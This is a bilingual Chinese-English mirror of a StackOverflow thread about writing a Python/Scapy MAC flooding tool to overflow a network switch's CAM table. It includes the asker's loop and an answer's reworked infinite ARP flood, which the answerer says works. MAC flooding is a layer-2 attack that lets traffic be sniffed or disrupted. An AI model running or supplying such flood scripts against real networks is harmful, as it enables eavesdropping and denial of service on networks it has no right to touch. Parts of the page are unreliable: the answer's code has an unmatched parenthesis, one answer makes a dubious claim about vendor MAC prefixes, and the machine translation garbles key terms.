python/scapy mac 泛洪脚本
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/1487389/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
python/scapy mac flooding script
提问by emada
I'm trying to make a small mac flood tool in python to fill my switches cam tables but i cant make the magic happen? can you see what im doing wrong?
我正在尝试用 python 制作一个小型的 mac flood 工具来填充我的开关凸轮表,但我不能让魔法发生?你能看出我做错了什么吗?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
while the code seems to run fine it just dont do its job. to test it i used wireshark to look at the packets then ran THC's parasite "which works" and the packets are almost the same so im not sure what is going on. Thank you for any help.
虽然代码似乎运行良好,但它并没有完成它的工作。为了测试它,我使用wireshark查看数据包然后运行THC的寄生虫“有效”并且数据包几乎相同所以我不确定发生了什么。感谢您的任何帮助。
回答by Doc
You can only use some mac address: a mac address is composed by six groups of two hexadecimal digits, separated by hyphens (-) or colons (:). The first three fields must be filled with some values, different for every vendor. If this fields are not set with any vendor code the server (or the client) will drop the packet. You can find mac vendors list on wireshark manuf file, or simply looking for it with google. You can check the address by typing "sudo ifcofig IFACE ether hw ADDRESS" in the terminal.
你只能使用一些mac地址:一个mac地址由六组两个十六进制数字组成,用连字符(-)或冒号(:)分隔。前三个字段必须填写一些值,每个供应商都不同。如果此字段未使用任何供应商代码设置,则服务器(或客户端)将丢弃数据包。您可以在wireshark manuf 文件中找到mac 供应商列表,或者直接使用google 查找。您可以通过在终端中输入“sudo ifcofig IFACE ether hw ADDRESS”来检查地址。
回答by dc5553
Emada,
绘田,
Mac addresses are learned by switches by using the source address only so no need to worry about destination randomizing.
Mac 地址由交换机仅使用源地址学习,因此无需担心目标随机化。
I have tested this and it seems to work well..you might also want to try the sendpfast option for flooding, however in my testing here sendp seemed to work faster?
我已经对此进行了测试,它似乎运行良好……您可能还想尝试使用 sendpfast 选项进行泛洪,但是在我的测试中,sendp 似乎工作得更快?
from scapy.all import *
while 1:
sendp(Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18)))
